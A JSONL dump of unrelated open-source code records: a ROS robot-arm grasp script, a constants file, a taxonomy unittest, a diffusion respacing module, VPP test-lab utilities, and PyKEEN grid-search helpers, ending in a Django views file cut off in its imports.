{"seq_id":"73103877904","text":"#!/usr/bin/env python3\n\nfrom putarm_ur3e_utils.srv import GrabObj, GrabObjResponse\nfrom putarm_ur3e_utils.srv import GoHome, GoHomeResponse\nfrom putarm_ur3e_utils.srv import GoToObj,GoToObjResponse\nimport sys\nimport copy\nimport rospy\nimport geometry_msgs.msg\nfrom math import pi\nfrom std_msgs.msg import String\nfrom ur_msgs.srv import SetIO\nimport geometry_msgs\nimport message_filters\nimport tf\n\nimport numpy as np\nimport rosservice\n\ngrab_prox = rospy.ServiceProxy(\"/grab_object_server\", GrabObj)\nhome_prox = rospy.ServiceProxy(\"/go_home_server\", GoHome)\ngoto_prox = rospy.ServiceProxy(\"/goto_object_server\",GoToObj)\n\npose_1 = geometry_msgs.msg.Pose()\npose_1.position.x = 0.1\npose_1.position.y = 0.79\npose_1.position.z = 0.50\npose_1.orientation.x = 0.0\npose_1.orientation.y = 0.9999997\npose_1.orientation.z = 0.0\npose_1.orientation.w = 0.0007963\n\npose_1_b = geometry_msgs.msg.Pose()\npose_1_b.position.x = 0.1\npose_1_b.position.y = 0.79\npose_1_b.position.z = 0.42\npose_1_b.orientation.x = 0.0\npose_1_b.orientation.y = 0.9999997\npose_1_b.orientation.z = 0.0\npose_1_b.orientation.w = 0.0007963\n\npose_2 = geometry_msgs.msg.Pose()\npose_2.position.x = -0.1\npose_2.position.y = 0.79\npose_2.position.z = 0.50\npose_2.orientation.x = 0.0\npose_2.orientation.y = 0.9999997\npose_2.orientation.z = 0.0\npose_2.orientation.w = 0.0007963\n\npose_2_b = geometry_msgs.msg.Pose()\npose_2_b.position.x = -0.1\npose_2_b.position.y = 0.79\npose_2_b.position.z = 0.42\npose_2_b.orientation.x = 0.0\npose_2_b.orientation.y = 0.9999997\npose_2_b.orientation.z = 
0.0\npose_2_b.orientation.w = 0.0007963\n\nwait_delay = 0.2\n\ndef main():\n rospy.init_node('scenario2')\n home_prox(angle_vector=[-60,-70,-90,-80,76,-152])\n grab_prox(pins=[16,17],states=[0,0])\n rospy.sleep(wait_delay)\n listener = tf.TransformListener()\n bottle_pose = geometry_msgs.msg.Pose()\n rate = rospy.Rate(10.0)\n counter = 30\n while counter>0:\n try:\n (trans,rot) = listener.lookupTransform('/world', '/bottle', rospy.Time(0))\n except (tf.LookupException, tf.ConnectivityException, tf.ExtrapolationException):\n continue\n\n #print(trans,rot)\n bottle_pose.position.x = trans[0]\n bottle_pose.position.y = trans[1]\n bottle_pose.position.z = trans[2]\n\n bottle_pose.orientation.x = rot[0]\n bottle_pose.orientation.y = rot[1]\n bottle_pose.orientation.z = rot[2]\n bottle_pose.orientation.w = rot[3]\n counter = counter - 1\n\n rate.sleep()\n\n print(bottle_pose)\n grab_prox(pins=[16,17],states=[0,0])\n home_prox(angle_vector=[-60,-70,-90,-80,76,-152])\n rospy.sleep(wait_delay)\n bottle_pose.position.z += 0.17\n goto_prox(object_coordinates=bottle_pose)\n rospy.sleep(wait_delay)\n bottle_pose.position.z -= 0.05\n goto_prox(object_coordinates=bottle_pose)\n grab_prox(pins=[16,17],states=[1,1])\n rospy.sleep(2*wait_delay)\n bottle_pose.position.z += 0.05\n goto_prox(object_coordinates=bottle_pose)\n rospy.sleep(wait_delay)\n home_prox(angle_vector=[-60,-70,-90,-80,76,-152])\n rospy.sleep(wait_delay)\n\n\nif __name__ == \"__main__\":\n main()\n\n# rosservice call /goto_object_service \"object_coordinates:\n# position:\n# x: 0.20\n# y: 0.69\n# z: 0.23\n# orientation:\n# x: 0.0\n# y: 0.9999997\n# z: 0.0\n# w: 0.0007963\"\n","repo_name":"filesmuggler/putarm_ur3e","sub_path":"putarm_ur3e_utils/scripts/scenarios/scenario2.py","file_name":"scenario2.py","file_ext":"py","file_size_in_byte":3328,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"15204015743","text":"\"\"\"Workaround to break cyclic imports.\"\"\"\n\nAGS_NAME = 'average_genome_size'\nALPHA_DIV_NAME = 'alpha_diversity'\nANCESTRY_NAME = 'putative_ancestry'\nBETA_DIV_NAME = 'beta_diversity'\nCARD_AMR_NAME = 'card_amr_genes'\nFUNC_GENES_NAME = 'functional_genes'\nHMP_NAME = 'hmp'\nMACROBES_NAME = 'macrobe_abundance'\nMETHYLS_NAME = 'methyltransferases'\nMICROBE_DIR_NAME = 'microbe_directory'\nPATHWAYS_NAME = 'pathways'\nREAD_STATS_NAME = 'read_stats'\nREADS_CLASSIFIED_NAME = 'reads_classified'\nSAMPLE_SIMILARITY_NAME = 'sample_similarity'\nTAXA_TREE_NAME = 'taxa_tree'\nTAXON_ABUNDANCE_NAME = 'taxon_abundance'\nVFDB_NAME = 'virulence_factors'\nVOLCANO_NAME = 'volcano'\n\nALL_MODULE_NAMES = [\n AGS_NAME,\n ALPHA_DIV_NAME,\n ANCESTRY_NAME,\n BETA_DIV_NAME,\n CARD_AMR_NAME,\n FUNC_GENES_NAME,\n HMP_NAME,\n MACROBES_NAME,\n METHYLS_NAME,\n MICROBE_DIR_NAME,\n READ_STATS_NAME,\n PATHWAYS_NAME,\n READS_CLASSIFIED_NAME,\n SAMPLE_SIMILARITY_NAME,\n TAXA_TREE_NAME,\n TAXON_ABUNDANCE_NAME,\n VFDB_NAME,\n VOLCANO_NAME,\n]\n","repo_name":"MetaGenScope/metagenscope-server","sub_path":"app/analysis_results/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":1034,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"71200139986","text":"import logging\nimport StringIO\nimport unittest\nfrom django.utils import simplejson\n\n# Local imports\nfrom common import subjects\n\n_TEST_YAML = \"\"\"\nroot:\n - math\n - technology\n - communication\n - health\n - money\n - society\n - 'sports & recreation'\n - 
'hobby'\n - 'misc'\n\ntechnology:\n - physics\n - chemistry\n - biology\n - geology\n - medicine\n - engineering\n\nengineering:\n - mechanical\n - electrical\n - chemical\n - aeronautical\n - genetic\n - 'software/computation'\n - food\n - textiles\n - education\n\n'software/computation':\n - 'introduction to computer programming'\n - 'algorithms & data structures'\n - 'abstraction'\n - 'programming languages'\n - 'operating systems'\n - 'compilers'\n - 'memory architectures and coping with latency'\n - 'data communication, networks and routing'\n\n'programming languages':\n - C\n - BASIC\n - C++\n - 'ECMAScript derivatives'\n - FORTRAN\n - Haskell\n - Python\n\"\"\"\n\n\nclass SubjectTaxonomyTest(unittest.TestCase):\n \"\"\"Tests the SubjectTaxonomy class.\"\"\"\n\n def testSimpleRoots(self):\n taxonomy = subjects.SubjectTaxonomy()\n rootIds = [\n 'math',\n 'technology',\n 'health',\n ]\n for rootId in rootIds:\n item = subjects.SubjectItem(rootId)\n taxonomy.AddSubject(item, None)\n\n self.assertEqual(3, len(taxonomy._roots))\n self.assertEqual('technology',\n taxonomy.GetSubject('technology').subject_id)\n\n def testYamlImport(self):\n stream = StringIO.StringIO(_TEST_YAML)\n taxonomy = subjects._GetSubjectsTaxonomyFromYaml(stream)\n\n self.assertEqual(9, len(taxonomy._roots))\n self.assertEqual('technology',\n taxonomy.GetSubject('technology').subject_id)\n self.assertEqual(6, len(taxonomy.GetChildSubjects('technology')))\n\n self.assertEqual('programming languages',\n taxonomy.GetParent('Python').subject_id)\n\n def testRootToDictOfRoot(self):\n stream = StringIO.StringIO(_TEST_YAML)\n taxonomy = subjects._GetSubjectsTaxonomyFromYaml(stream)\n\n result = subjects._ToDict(taxonomy, None, 1)\n self.assertTrue(isinstance(result, dict))\n self.assertEqual(1, len(result))\n self.assertEqual(9, len(result['root']))\n\n item = result['root'][7]\n self.assertEqual('hobby', item['i'])\n self.assertEqual(True, item['l'])\n\n def testRootToDict(self):\n stream = StringIO.StringIO(_TEST_YAML)\n taxonomy = subjects._GetSubjectsTaxonomyFromYaml(stream)\n\n result = subjects._ToDict(taxonomy, None, 2)\n self.assertTrue(isinstance(result, dict))\n self.assertEqual(2, len(result))\n self.assertEqual(9, len(result['root']))\n self.assertEqual(6, len(result['technology']))\n\n item = result['technology'][5]\n self.assertEqual('engineering', item['i'])\n self.assertEqual(False, item['l'])\n\n def testEngineeringToDict(self):\n stream = StringIO.StringIO(_TEST_YAML)\n taxonomy = subjects._GetSubjectsTaxonomyFromYaml(stream)\n\n result = subjects._ToDict(taxonomy, 'engineering', 2)\n self.assertTrue(isinstance(result, dict))\n self.assertEqual(2, len(result))\n self.assertEqual(9, len(result['engineering']))\n self.assertEqual(8, len(result['software/computation']))\n self.assertEqual('compilers', result['software/computation'][5]['i'])\n\n def testRootToJson(self):\n stream = StringIO.StringIO(_TEST_YAML)\n taxonomy = subjects._GetSubjectsTaxonomyFromYaml(stream)\n\n resultJson = subjects.GetSubjectsJson(taxonomy, None)\n self.assertTrue(isinstance(resultJson, basestring))\n\n result = simplejson.loads(resultJson)\n self.assertTrue(isinstance(result, list))\n\n self.assertEqual(None, result[0])\n result = result[1]\n self.assertEqual(2, len(result))\n self.assertEqual(9, len(result['root']))\n self.assertEqual(6, len(result['technology']))\n\n item = result['technology'][5]\n self.assertEqual('engineering', item['i'])\n self.assertEqual(False, 
item['l'])\n","repo_name":"arjunsatyapal/lantern","sub_path":"demo1-test/test/test_subjects.py","file_name":"test_subjects.py","file_ext":"py","file_size_in_byte":3877,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"24718058851","text":"import numpy as np\nimport torch as th\n\nfrom .gaussian_diffusion import GaussianDiffusion\n\n\ndef space_timesteps(num_timesteps, section_counts):\n \"\"\"\n Create a list of timesteps to use from an original diffusion process,\n given the number of timesteps we want to take from equally-sized portions\n of the original process.\n\n For example, if there's 300 timesteps and the section counts are [10,15,20]\n then the first 100 timesteps are strided to be 10 timesteps, the second 100\n are strided to be 15 timesteps, and the final 100 are strided to be 20.\n\n If the stride is a string starting with \"ddim\", then the fixed striding\n from the DDIM paper is used, and only one section is allowed.\n\n :param num_timesteps: the number of diffusion steps in the original\n process to divide up.\n :param section_counts: either a list of numbers, or a string containing\n comma-separated numbers, indicating the step count\n per section. As a special case, use \"ddimN\" where N\n is a number of steps to use the striding from the\n DDIM paper.\n :return: a set of diffusion steps from the original process to use.\n \"\"\"\n if isinstance(section_counts, str):\n if section_counts.startswith(\"ddim\"):\n desired_count = int(section_counts[len(\"ddim\"):])\n for i in range(1, num_timesteps):\n if len(range(0, num_timesteps, i)) == desired_count:\n return set(range(0, num_timesteps, i))\n section_counts = [int(x) for x in section_counts.split(\",\")]\n if isinstance(section_counts, int):\n section_counts = [section_counts]\n size_per = num_timesteps // len(section_counts)\n extra = num_timesteps % len(section_counts)\n start_idx = 0\n all_steps = []\n\n if len(section_counts) == 1 and section_counts[0] > num_timesteps:\n return set(np.linspace(start=0, stop=num_timesteps, num=section_counts[0]))\n\n for i, section_count in enumerate(section_counts):\n size = size_per + (1 if i < extra else 0)\n if size < section_count:\n raise ValueError(\n f\"cannot divide section of {size} steps into {section_count}\"\n )\n if section_count <= 1:\n frac_stride = 1\n else:\n frac_stride = (size - 1) / (section_count - 1)\n cur_idx = 0.0\n taken_steps = []\n for _ in range(section_count):\n taken_steps.append(start_idx + round(cur_idx))\n cur_idx += frac_stride\n all_steps += taken_steps\n start_idx += size\n return set(all_steps)\n\n\nclass SpacedDiffusion(GaussianDiffusion):\n \"\"\"\n A diffusion process which can skip steps in a base diffusion process.\n\n :param use_timesteps: a collection (sequence or set) of timesteps from the\n original diffusion process to retain.\n :param kwargs: the kwargs to create the base diffusion process.\n \"\"\"\n\n def __init__(self, use_timesteps, conf=None, **kwargs):\n self.use_timesteps = set(use_timesteps)\n self.original_num_steps = len(kwargs[\"betas\"])\n self.conf = conf\n\n base_diffusion = GaussianDiffusion(conf=conf,\n **kwargs) # pylint: disable=missing-kwoa\n\n if conf.respace_interpolate:\n new_betas = resample_betas(\n kwargs[\"betas\"], int(conf.timestep_respacing))\n self.timestep_map = list(range(len(new_betas)))\n else:\n self.timestep_map = []\n new_betas = []\n last_alpha_cumprod = 1.0\n for i, alpha_cumprod in enumerate(base_diffusion.alphas_cumprod):\n if i in 
self.use_timesteps:\n new_betas.append(1 - alpha_cumprod / last_alpha_cumprod)\n last_alpha_cumprod = alpha_cumprod\n self.timestep_map.append(i)\n\n kwargs[\"betas\"] = np.array(new_betas)\n\n if conf.use_value_logger:\n conf.value_logger.add_value(\n new_betas, 'new_betas SpacedDiffusion')\n\n super().__init__(conf=conf, **kwargs)\n\n def p_mean_variance(\n self, model, *args, **kwargs\n ): # pylint: disable=signature-differs\n return super().p_mean_variance(self._wrap_model(model), *args, **kwargs)\n\n def training_losses(\n self, model, *args, **kwargs\n ): # pylint: disable=signature-differs\n return super().training_losses(self._wrap_model(model), *args, **kwargs)\n\n def condition_mean(self, cond_fn, *args, **kwargs):\n return super().condition_mean(self._wrap_model(cond_fn), *args, **kwargs)\n\n def condition_score(self, cond_fn, *args, **kwargs):\n return super().condition_score(self._wrap_model(cond_fn), *args, **kwargs)\n\n def _wrap_model(self, model):\n if isinstance(model, _WrappedModel):\n return model\n return _WrappedModel(\n model, self.timestep_map, self.rescale_timesteps,\n self.original_num_steps, self.conf\n )\n\n def _scale_timesteps(self, t):\n # Scaling is done by the wrapped model.\n return t\n\n\nclass _WrappedModel:\n def __init__(self, model, timestep_map, rescale_timesteps, original_num_steps, conf):\n self.model = model\n self.timestep_map = timestep_map\n self.rescale_timesteps = rescale_timesteps\n self.original_num_steps = original_num_steps\n self.conf = conf\n\n def __call__(self, x, ts, **kwargs):\n map_tensor = th.tensor( # pylint: disable=not-callable\n self.timestep_map, device=ts.device, dtype=ts.dtype)\n new_ts = map_tensor[ts]\n if self.rescale_timesteps:\n raise NotImplementedError()\n #new_ts = self.do_rescale_timesteps(new_ts)\n\n if self.conf.respace_interpolate:\n new_ts = new_ts.float() * (\n (self.conf.diffusion_steps - 1) / (float(self.conf.timestep_respacing) - 1.0))\n\n return self.model(x, new_ts, **kwargs)\n\n def do_rescale_timesteps(self, new_ts):\n new_ts = new_ts.float() * (1000.0 / self.original_num_steps)\n return new_ts\n","repo_name":"andreas128/RePaint","sub_path":"guided_diffusion/respace.py","file_name":"respace.py","file_ext":"py","file_size_in_byte":6220,"program_lang":"python","lang":"en","doc_type":"code","stars":1621,"dataset":"github-code","pt":"48"} +{"seq_id":"9121979401","text":"import binascii\n\nfrom robot.api import logger\n\nfrom resources.libraries.python.Constants import Constants\nfrom resources.libraries.python.DUTSetup import DUTSetup\nfrom resources.libraries.python.PapiExecutor import PapiExecutor\nfrom resources.libraries.python.ssh import exec_cmd_no_error\nfrom resources.libraries.python.topology import NodeType\n\n\nclass VPPUtil(object):\n \"\"\"General class for any VPP related methods/functions.\"\"\"\n\n @staticmethod\n def show_vpp_settings(node, *additional_cmds):\n \"\"\"Print default VPP settings. 
In case others are needed, can be\n        accepted as next parameters (each setting one parameter), preferably\n        in form of a string.\n\n        :param node: VPP node.\n        :param additional_cmds: Additional commands that the vpp should print\n            settings for.\n        :type node: dict\n        :type additional_cmds: tuple\n        \"\"\"\n        def_setting_tb_displayed = {\n            'IPv6 FIB': 'ip6 fib',\n            'IPv4 FIB': 'ip fib',\n            'Interface IP': 'int addr',\n            'Interfaces': 'int',\n            'ARP': 'ip arp',\n            'Errors': 'err'\n        }\n\n        if additional_cmds:\n            for cmd in additional_cmds:\n                def_setting_tb_displayed['Custom Setting: {}'.format(cmd)] = cmd\n\n        for _, cmd in def_setting_tb_displayed.items():\n            command = 'vppctl sh {cmd}'.format(cmd=cmd)\n            exec_cmd_no_error(node, command, timeout=30, sudo=True)\n\n    @staticmethod\n    def restart_vpp_service(node):\n        \"\"\"Restart VPP service on the specified topology node.\n\n        :param node: Topology node.\n        :type node: dict\n        \"\"\"\n        DUTSetup.restart_service(node, Constants.VPP_UNIT)\n\n    @staticmethod\n    def restart_vpp_service_on_all_duts(nodes):\n        \"\"\"Restart VPP service on all DUT nodes.\n\n        :param nodes: Topology nodes.\n        :type nodes: dict\n        \"\"\"\n        for node in nodes.values():\n            if node['type'] == NodeType.DUT:\n                VPPUtil.restart_vpp_service(node)\n\n    @staticmethod\n    def stop_vpp_service(node):\n        \"\"\"Stop VPP service on the specified topology node.\n\n        :param node: Topology node.\n        :type node: dict\n        \"\"\"\n        DUTSetup.stop_service(node, Constants.VPP_UNIT)\n\n    @staticmethod\n    def stop_vpp_service_on_all_duts(nodes):\n        \"\"\"Stop VPP service on all DUT nodes.\n\n        :param nodes: Topology nodes.\n        :type nodes: dict\n        \"\"\"\n        for node in nodes.values():\n            if node['type'] == NodeType.DUT:\n                VPPUtil.stop_vpp_service(node)\n\n    @staticmethod\n    def verify_vpp_installed(node):\n        \"\"\"Verify that VPP is installed on the specified topology node.\n\n        :param node: Topology node.\n        :type node: dict\n        \"\"\"\n        cmd = 'command -v vpp'\n        exec_cmd_no_error(\n            node, cmd, message='VPP is not installed!')\n\n    @staticmethod\n    def verify_vpp_started(node):\n        \"\"\"Verify that VPP is started on the specified topology node.\n\n        :param node: Topology node.\n        :type node: dict\n        \"\"\"\n        cmd = ('vppctl show pci 2>&1 | '\n               'fgrep -v \"Connection refused\" | '\n               'fgrep -v \"No such file or directory\"')\n        exec_cmd_no_error(\n            node, cmd, sudo=True, message='VPP failed to start!', retries=120)\n\n    @staticmethod\n    def verify_vpp(node):\n        \"\"\"Verify that VPP is installed and started on the specified topology\n        node.\n\n        :param node: Topology node.\n        :type node: dict\n        :raises RuntimeError: If VPP service fails to start.\n        \"\"\"\n        VPPUtil.verify_vpp_installed(node)\n        try:\n            # Verify responsiveness of vppctl.\n            VPPUtil.verify_vpp_started(node)\n            # Verify responsiveness of PAPI.\n            VPPUtil.show_log(node)\n        finally:\n            DUTSetup.get_service_logs(node, Constants.VPP_UNIT)\n\n    @staticmethod\n    def verify_vpp_on_all_duts(nodes):\n        \"\"\"Verify that VPP is installed and started on all DUT nodes.\n\n        :param nodes: Nodes in the topology.\n        :type nodes: dict\n        \"\"\"\n        for node in nodes.values():\n            if node['type'] == NodeType.DUT:\n                VPPUtil.verify_vpp(node)\n\n    @staticmethod\n    def vpp_show_version(node, verbose=True):\n        \"\"\"Run \"show_version\" PAPI command.\n\n        :param node: Node to run command on.\n        :param verbose: Show version, compile date and compile location if True\n            otherwise show only version.\n        :type node: dict\n        :type verbose: bool\n        :returns: VPP version.\n        :rtype: str\n        \"\"\"\n        with PapiExecutor(node) as papi_exec:\n            data = 
papi_exec.add('show_version').get_replies().verify_reply()\n        version = ('VPP version: {ver}\\n'.\n                   format(ver=data['version'].rstrip('\\x00')))\n        if verbose:\n            version += ('Compile date: {date}\\n'\n                        'Compile location: {cl}\\n '.\n                        format(date=data['build_date'].rstrip('\\x00'),\n                               cl=data['build_directory'].rstrip('\\x00')))\n        logger.info(version)\n        return data['version'].rstrip('\\x00')\n\n    @staticmethod\n    def show_vpp_version_on_all_duts(nodes):\n        \"\"\"Show VPP version verbose on all DUTs.\n\n        :param nodes: Nodes in the topology.\n        :type nodes: dict\n        \"\"\"\n        for node in nodes.values():\n            if node['type'] == NodeType.DUT:\n                VPPUtil.vpp_show_version(node)\n\n    @staticmethod\n    def vpp_show_interfaces(node):\n        \"\"\"Run \"show interface\" CLI command.\n\n        :param node: Node to run command on.\n        :type node: dict\n        \"\"\"\n\n        cmd = 'sw_interface_dump'\n        cmd_reply = 'sw_interface_details'\n        args = dict(name_filter_valid=0, name_filter='')\n        err_msg = 'Failed to get interface dump on host {host}'.format(\n            host=node['host'])\n        with PapiExecutor(node) as papi_exec:\n            papi_resp = papi_exec.add(cmd, **args).get_replies(err_msg)\n\n        papi_if_dump = papi_resp.reply[0]['api_reply']\n\n        if_data = list()\n        for item in papi_if_dump:\n            data = item[cmd_reply]\n            data['interface_name'] = data['interface_name'].rstrip('\\x00')\n            data['tag'] = data['tag'].rstrip('\\x00')\n            data['l2_address'] = str(':'.join(binascii.hexlify(\n                data['l2_address'])[i:i + 2] for i in range(0, 12, 2)).\n                decode('ascii'))\n            if_data.append(data)\n        # TODO: return only base data\n        logger.trace('Interface data of host {host}:\\n{if_data}'.format(\n            host=node['host'], if_data=if_data))\n\n    @staticmethod\n    def vpp_enable_traces_on_dut(node, fail_on_error=False):\n        \"\"\"Enable vpp packet traces on the DUT node.\n\n        :param node: DUT node to set up.\n        :param fail_on_error: If True, keyword fails if an error occurs,\n            otherwise passes.\n        :type node: dict\n        :type fail_on_error: bool\n        \"\"\"\n        cmds = [\n            \"trace add dpdk-input 50\",\n            \"trace add vhost-user-input 50\",\n            \"trace add memif-input 50\"\n        ]\n\n        for cmd in cmds:\n            try:\n                PapiExecutor.run_cli_cmd(node, cmd)\n            except AssertionError:\n                if fail_on_error:\n                    raise\n\n    @staticmethod\n    def vpp_enable_traces_on_all_duts(nodes, fail_on_error=False):\n        \"\"\"Enable vpp packet traces on all DUTs in the given topology.\n\n        :param nodes: Nodes in the topology.\n        :param fail_on_error: If True, keyword fails if an error occurs,\n            otherwise passes.\n        :type nodes: dict\n        :type fail_on_error: bool\n        \"\"\"\n        for node in nodes.values():\n            if node['type'] == NodeType.DUT:\n                VPPUtil.vpp_enable_traces_on_dut(node, fail_on_error)\n\n    @staticmethod\n    def vpp_enable_elog_traces_on_dut(node):\n        \"\"\"Enable API/CLI/Barrier traces on the DUT node.\n\n        :param node: DUT node to set up.\n        :type node: dict\n        \"\"\"\n        PapiExecutor.run_cli_cmd(node, \"elog trace api cli barrier\")\n\n    @staticmethod\n    def vpp_enable_elog_traces_on_all_duts(nodes):\n        \"\"\"Enable API/CLI/Barrier traces on all DUTs in the given topology.\n\n        :param nodes: Nodes in the topology.\n        :type nodes: dict\n        \"\"\"\n        for node in nodes.values():\n            if node['type'] == NodeType.DUT:\n                VPPUtil.vpp_enable_elog_traces_on_dut(node)\n\n    @staticmethod\n    def show_event_logger_on_dut(node):\n        \"\"\"Show event logger on the DUT node.\n\n        :param node: DUT node to show traces on.\n        :type node: dict\n        \"\"\"\n        PapiExecutor.run_cli_cmd(node, \"show event-logger\")\n\n    @staticmethod\n    def show_event_logger_on_all_duts(nodes):\n        \"\"\"Show event logger on 
all DUTs in the given topology.\n\n        :param nodes: Nodes in the topology.\n        :type nodes: dict\n        \"\"\"\n        for node in nodes.values():\n            if node['type'] == NodeType.DUT:\n                VPPUtil.show_event_logger_on_dut(node)\n\n    @staticmethod\n    def show_log(node):\n        \"\"\"Show log on the specified topology node.\n\n        :param node: Topology node.\n        :type node: dict\n        :returns: VPP log data.\n        :rtype: list\n        \"\"\"\n        return PapiExecutor.run_cli_cmd(node, \"show log\")[\"reply\"]\n\n    @staticmethod\n    def vpp_show_threads(node):\n        \"\"\"Show VPP threads on node.\n\n        :param node: Node to run command on.\n        :type node: dict\n        :returns: VPP thread data.\n        :rtype: list\n        \"\"\"\n        with PapiExecutor(node) as papi_exec:\n            data = papi_exec.add('show_threads').get_replies().\\\n                verify_reply()[\"thread_data\"]\n\n        threads_data = list()\n        for thread in data:\n            thread_data = list()\n            for item in thread:\n                if isinstance(item, unicode):\n                    item = item.rstrip('\\x00')\n                thread_data.append(item)\n            threads_data.append(thread_data)\n\n        logger.info(\"show threads:\\n{threads}\".format(threads=threads_data))\n\n        return threads_data\n","repo_name":"preym17/csit","sub_path":"resources/libraries/python/VPPUtil.py","file_name":"VPPUtil.py","file_ext":"py","file_size_in_byte":10323,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"73292147984","text":"# -*- coding: utf-8 -*-\n\n\"\"\"Utilities for PyKEEN playtime.\"\"\"\n\nfrom __future__ import annotations\n\nimport itertools as itt\nimport json\nimport logging\nimport math\nfrom abc import ABC, abstractmethod\nfrom pathlib import Path\nfrom typing import Any, Callable, ClassVar, Dict, Iterable, Mapping, Optional, Sequence, Tuple, Union\n\nimport pandas as pd\nfrom tabulate import tabulate\nfrom tqdm import tqdm\n\n__all__ = [\n    'fix_logging',\n    'iter_configs_trials',\n    'Runner',\n    'GridType',\n]\n\nfrom pykeen.constants import PYKEEN_EXPERIMENTS\n\nGridType = Mapping[str, Sequence[Any]]\n\n\ndef fix_logging() -> None:\n    \"\"\"Fix over-logging in PyKEEN.\"\"\"\n    logging.getLogger('pykeen.evaluation.evaluator').setLevel(logging.ERROR)\n    logging.getLogger('pykeen.stoppers.early_stopping').setLevel(logging.ERROR)\n    logging.getLogger('pykeen.triples.triples_factory').setLevel(logging.ERROR)\n    logging.getLogger('pykeen.models.cli').setLevel(logging.ERROR)\n\n\ndef iter_configs_trials(\n    grid: Union[str, Path, Mapping[str, Sequence[Any]]],\n    *,\n    trials: Optional[int] = None,\n    **kwargs,\n):\n    \"\"\"Iterate over several configurations for a given number of trials.\n\n    :param grid: Either a grid search dictionary or a str/path for a JSON\n        file containing one.\n    :param trials: The number of trials that should be conducted for each configuration. 
Defaults to 10.\n :param kwargs: Keyword arguments to pass through to :func:`tqdm.tqdm`.\n :returns: An iterator for trials\n \"\"\"\n config_iterator = _iter_configs(grid=grid, **kwargs)\n return _ConfigTrialIterator(config_iterator, trials)\n\n\ndef _iter_configs(\n grid: Union[str, Path, Mapping[str, Sequence[Any]]],\n *,\n order: Optional[Sequence[str]] = None,\n **kwargs,\n):\n if isinstance(grid, (str, Path)):\n return _ConfigIterator.from_path(grid, order=order, **kwargs)\n return _ConfigIterator(grid, order=order, **kwargs)\n\n\nclass _ConfigTrialIterator:\n def __init__(self, config_iterator: _ConfigIterator, trials: Optional[int] = None):\n \"\"\"Initialize the configuration/trial iterator.\n\n :param config_iterator: the configuration iterator to wrap\n :param trials: the number of trials, defaults to 10.\n \"\"\"\n self.config_iterator = config_iterator\n self.trials = trials or 10\n\n @property\n def keys(self):\n \"\"\"Return the keys of the wrapped iterator.\"\"\"\n return self.config_iterator.keys\n\n def __iter__(self) -> Iterable[Tuple[Mapping[str, Any], int]]:\n with tqdm(\n self.config_iterator.kwargs,\n total=self.trials * self.config_iterator.total,\n **self.config_iterator.kwargs,\n ) as it:\n for config in iter(self.config_iterator):\n it.set_postfix(config)\n for trial in range(1, 1 + self.trials):\n it.update()\n yield config, trial\n\n\nclass _ConfigIterator:\n def __init__(self, grid, *, order: Optional[Sequence[str]] = None, **kwargs):\n \"\"\"Initialize the configuration iterator.\n\n :param grid: The grid to generate configurations over\n :param order: The optional ordering of the keys\n :param kwargs: keyword arguments to pass through to :func:`tqdm.tqdm`\n \"\"\"\n if order:\n self.keys = order\n self.values = [grid[k] for k in order]\n else:\n self.keys, self.values = zip(*grid.items()) # type: ignore\n\n self.total = math.prod(len(v) for v in self.values)\n self.kwargs = kwargs\n\n @classmethod\n def from_path(cls, path: Union[str, Path], *, order: Optional[Sequence[str]] = None, **kwargs) -> _ConfigIterator:\n \"\"\"Create a config iterator from a grid stored in a JSON file.\"\"\"\n with open(path) as file:\n return cls(json.load(file), order=order, **kwargs)\n\n def __iter__(self):\n for v in itt.product(*self.values):\n yield dict(zip(self.keys, v))\n\n\nclass Runner(ABC):\n \"\"\"A harness for grid search experiment runners.\"\"\"\n\n #: The name of the experiment\n name: ClassVar[str]\n #: The labels of the results returned by the run() function\n result_labels: ClassVar[Sequence[str]]\n #: The grid to search\n grid: ClassVar[GridType]\n #: A dictionary of reformatters for config values\n formatters: ClassVar[Mapping[str, Callable[[Any], str]]] = {}\n\n def __init__(self, trials: Optional[int] = None):\n \"\"\"Initialize the runner.\n\n :param trials: The number of trials to run. 
Defaults to 10.\n :raises ValueError: if the ``result_labels`` variable is the wrong length\n \"\"\"\n self.directory = PYKEEN_EXPERIMENTS / self.name\n self.directory.mkdir(exist_ok=True, parents=True)\n self.path = self.directory / 'results.tsv'\n\n self.it = iter_configs_trials(\n self.grid,\n trials=trials,\n )\n\n precalculated: Dict[Tuple[Any, ...], Sequence[Any]] = {}\n if self.path.exists():\n key_len = len(self.it.keys) + 1\n _df = pd.read_csv(self.path, sep='\\t')\n for row in map(tuple, _df.values):\n key = row[:key_len]\n # tqdm.write(f'precalculated: {\",\".join(map(str, key))}')\n precalculated[key] = row[key_len:]\n\n self.rows = []\n self.columns = (*self.it.keys, 'trial', *self.result_labels)\n with self.path.open('w') as file:\n print(*self.columns, sep='\\t', file=file)\n for config, trial in self.it:\n key = tuple(self._format(key, config[key]) for key in self.it.keys) + (trial,)\n if key in precalculated:\n row_end = precalculated[key]\n else:\n # tqdm.write(f'calculated: {\",\".join(map(str, key))}')\n row_end = self.run(config, trial)\n if len(row_end) != len(self.result_labels):\n raise ValueError(\n f'Not enough results returned. '\n f'Got {len(row_end)}, should have got {len(self.result_labels)}',\n )\n row = (*key, *row_end)\n print(*row, sep='\\t', file=file)\n self.rows.append(row)\n\n self.df = pd.DataFrame(\n self.rows,\n columns=self.columns,\n )\n\n def _format(self, key: str, value) -> str:\n formatter = self.formatters.get(key)\n if formatter is None:\n return value\n return formatter(value)\n\n @abstractmethod\n def run(self, config, trial) -> Sequence[Any]:\n \"\"\"Run the experiment.\"\"\"\n raise NotImplementedError\n\n def print(self) -> None:\n \"\"\"Print the results of all experiments.\"\"\"\n print(tabulate(self.df.values, headers=self.df.columns))\n","repo_name":"cthoyt/pykeen-playtime","sub_path":"src/pykeen_playtime/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":6854,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"34694144351","text":"from django.contrib.auth import authenticate, login, logout\nfrom django.db import IntegrityError\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.shortcuts import render, get_object_or_404,redirect\nfrom django.urls import reverse\nfrom django import forms \nfrom .models import User\nfrom .models import Listing\nfrom .models import Bid\nfrom .models import 